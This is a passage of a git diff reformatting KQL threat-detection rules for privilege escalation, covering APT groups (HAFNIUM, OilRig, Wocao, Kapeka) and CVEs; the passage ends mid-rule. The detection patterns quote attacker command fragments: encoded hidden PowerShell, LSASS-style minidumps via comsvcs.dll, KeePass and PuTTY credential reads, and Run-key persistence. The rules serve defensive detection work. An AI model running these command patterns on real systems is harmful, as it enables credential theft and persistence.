MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql index ddea3ae3..57830565 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql @@ -1,13 +1,13 @@ -// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-20 -// Level: medium -// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. -// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788 -// False Positives: -// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes. - -DeviceProcessEvents +// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: medium +// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. +// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788 +// False Positives: +// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes. + +DeviceProcessEvents | where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql index 42e82d5a..3f2876f4 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql @@ -1,10 +1,10 @@ -// Title: Defrag Deactivation -// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) -// Date: 2019-03-04 -// Level: medium -// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats - -DeviceProcessEvents +// Title: Defrag Deactivation +// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +// Date: 2019-03-04 +// Level: medium +// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql index 1ab20b16..58f0233d 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql @@ -1,10 +1,10 @@ -// Title: Exploiting CVE-2019-1388 -// Author: Florian Roth (Nextron Systems) -// Date: 2019-11-20 -// Level: critical -// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploiting CVE-2019-1388 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-20 +// Level: critical +// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql index cf85ad6d..e6427e64 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql @@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - Custom Protocol Handler Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the setting of a custom protocol handler with the name "rogue". -// Seen being created by Forest Blizzard APT as reported by MSFT. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Forest Blizzard APT - Custom Protocol Handler Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of a custom protocol handler with the name "rogue". +// Seen being created by Forest Blizzard APT as reported by MSFT. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql index 5a9afe86..171a3356 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql @@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the setting of the DLL that handles the custom protocol handler. -// Seen being created by Forest Blizzard APT as reported by MSFT. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of the DLL that handles the custom protocol handler. +// Seen being created by Forest Blizzard APT as reported by MSFT. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql index 00179650..1e7b3461 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql @@ -1,12 +1,12 @@ -// Title: HAFNIUM Exchange Exploitation Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-09 -// Level: critical -// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HAFNIUM Exchange Exploitation Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: critical +// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "Temp\\__output") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql index 69a250e6..47eabde4 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql @@ -1,13 +1,13 @@ -// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity -// Author: @kostastsale -// Date: 2023-08-07 -// Level: high -// Description: Detects the execution of installed GuLoader malware on the host. -// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity +// Author: @kostastsale +// Date: 2023-08-07 +// Level: high +// Description: Detects the execution of installed GuLoader malware on the host. +// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql index 8c3c6f0c..494481e5 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql @@ -1,12 +1,12 @@ -// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-22 -// Level: critical -// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats -// False Positives: -// - Possibly some Microsoft Edge upgrades - -DeviceFileEvents +// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats +// False Positives: +// - Possibly some Microsoft Edge upgrades + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql index 725f8d15..ad21478e 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql @@ -1,10 +1,10 @@ -// Title: Kapeka Backdoor Autorun Persistence -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: high -// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats - -DeviceRegistryEvents +// Title: Kapeka Backdoor Autorun Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents | where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql index 938fdaf6..a11223a9 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql @@ -1,16 +1,16 @@ -// Title: Kapeka Backdoor Persistence Activity -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: high -// Description: Detects Kapeka backdoor persistence activity. -// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). -// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. -// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. -// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Kapeka Backdoor Persistence Activity +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects Kapeka backdoor persistence activity. +// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). +// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. +// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. +// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and ((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql index 5fcfcb55..8766ef2a 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql @@ -1,10 +1,10 @@ -// Title: Leviathan Registry Key Activity -// Author: Aidan Bracher -// Date: 2020-07-07 -// Level: critical -// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats - -DeviceRegistryEvents +// Title: Leviathan Registry Key Activity +// Author: Aidan Bracher +// Date: 2020-07-07 +// Level: critical +// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql index af3d2ddb..c2c2117e 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql @@ -1,12 +1,12 @@ -// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-12-19 -// Level: high -// Description: Detects the execution of more.com and vbc.exe in the process tree. -// This behavior was observed by a set of samples related to Lummac Stealer. -// The Lummac payload is injected into the vbc.exe process. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats - -DeviceProcessEvents +// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-12-19 +// Level: high +// Description: Detects the execution of more.com and vbc.exe in the process tree. +// This behavior was observed by a set of samples related to Lummac Stealer. +// The Lummac payload is injected into the vbc.exe process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql index 8e7dbbd1..88d627da 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql @@ -1,15 +1,15 @@ -// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation -// Author: Swachchhanda Shrawn Poudel (Nextron Systems) -// Date: 2025-10-02 -// Level: high -// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. -// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. -// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, -// potentially leading to arbitrary code execution and privilege escalation. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats -// False Positives: -// - Backup locations - -DeviceFileEvents +// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: high +// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. +// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. +// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, +// potentially leading to arbitrary code execution and privilege escalation. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats +// False Positives: +// - Backup locations + +DeviceFileEvents | where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql index 9f188472..cbfa9fa2 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql @@ -1,12 +1,12 @@ -// Title: OilRig APT Activity -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2018-03-23 -// Level: critical -// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: OilRig APT Activity +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql index bd67c52b..da5c71ca 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql @@ -1,12 +1,12 @@ -// Title: OilRig APT Registry Persistence -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2018-03-23 -// Level: critical -// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: OilRig APT Registry Persistence +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql index 2c629abe..f220cfaa 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql @@ -1,12 +1,12 @@ -// Title: Operation Wocao Activity -// Author: Florian Roth (Nextron Systems), frack113 -// Date: 2019-12-20 -// Level: high -// Description: Detects activity mentioned in Operation Wocao report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats -// False Positives: -// - Administrators that use checkadmin.exe tool to enumerate local administrators - -DeviceProcessEvents +// Title: Operation Wocao Activity +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2019-12-20 +// Level: high +// Description: Detects activity mentioned in Operation Wocao report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Administrators that use checkadmin.exe tool to enumerate local administrators + +DeviceProcessEvents | where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql index 58ba9e91..f6d934a8 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql @@ -1,12 +1,12 @@ -// Title: Pingback Backdoor Activity -// Author: Bhabesh Raj -// Date: 2021-05-05 -// Level: high -// Description: Detects the use of Pingback backdoor that creates ICMP 